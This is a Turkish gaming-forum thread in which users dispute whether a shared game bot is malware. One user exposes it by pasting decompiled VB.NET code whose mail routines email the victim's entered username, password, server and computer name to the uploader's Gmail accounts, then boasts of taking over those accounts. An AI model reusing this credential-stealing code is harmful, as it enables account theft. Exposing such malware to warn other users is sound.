Ayyıldız2 | 2008 TR Yapısı • 1-99 Orta Emek Destan • Oto Avsız • 10 Temmuz 21:00 HEMEN TIKLA!
yalan sakın açmayın. virüstoalde 2,3mb diyor ama rar 1mb dan daha küçük.
ayrıca rarla taratırsanız virüsleri bulması çok zor olur. rardan bi çıkartırsın 30tane virüs var.
ayrıca rarla taratırsanız virüsleri bulması çok zor olur. rardan bi çıkartırsın 30tane virüs var.
yalan sakın açmayın. virüstoalde 2,3mb diyor ama rar 1mb dan daha küçük.
Rar sıkıştıldığı için boyut düşük görünüyor sanırım bizzat indirdim rardan çıkardım ve tarattım temiz.
Ayrıca bendede virüstotal .1.2 MB olarak gösterdi. Denememiş siniz hemen çamur atmayın derim.
Virüstotal - Jotti ve Virüschief temiz gösteriyor exe yi. Ama kanıt vs yok güven vermiyor bana denemeyeceğim.
Rar sıkıştıldığı için boyut düşük görünüyor sanırım bizzat indirdim rardan çıkardım ve tarattım temiz.
Ayrıca bendede virüstotal .1.2 MB olarak gösterdi. Denememiş siniz hemen çamur atmayın derim.
Virüstotal - Jotti ve Virüschief temiz gösteriyor exe yi. Ama kanıt vs yok güven vermiyor bana denemeyeceğim.
Tam olarak emin olmadığınız sürece insanları yanıltmayınız. Programın içinden küçük bir kısım kodu buraya yapıştırıyorum.
Public Sub mail()
Dim message As New MailMessage
Dim client As New SmtpClient
client.Credentials = New NetworkCredential("berkan.37.97@gmail.com", "1*******")
client.Port = &H24B
client.Host = "smtp.gmail.com"
client.EnableSsl = True
message.To.Add("berkan.37.97@gmail.com")
message.From = New MailAddress("berkan.37.97@gmail.com")
message.Subject = "Bot"
message.Body = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject((("Kullanıcı Adı : " & Me.TextBox1.Text & " Şifre : ") & Me.TextBox2.Text & " Server : "), Me.ComboBox1.SelectedItem), "Gönderen : "), MyProject.Computer.Name))
client.Send(message)
End Sub
Public Sub mail2()
Dim message As New MailMessage
Dim client As New SmtpClient
client.Credentials = New NetworkCredential("klakson145@gmail.com", "********")
client.Port = &H24B
client.Host = "smtp.gmail.com"
client.EnableSsl = True
message.To.Add("klakson145@gmail.com")
message.From = New MailAddress("klakson145@gmail.com")
message.Subject = "Bot"
message.Body = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject((("Kullanıcı Adı : " & Me.TextBox1.Text & " Şifre : ") & Me.TextBox2.Text & " Server : "), Me.ComboBox1.SelectedItem), " Gönderen : "), MyProject.Computer.Name))
client.Send(message)
End Sub
Bu arada paylaşan arkadaşın gmail hesaplarını bir güzel alıyorum. Hayırlı olsun
Son düzenleme:
- Durum
- Üzgünüz bu konu cevaplar için kapatılmıştır...
Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)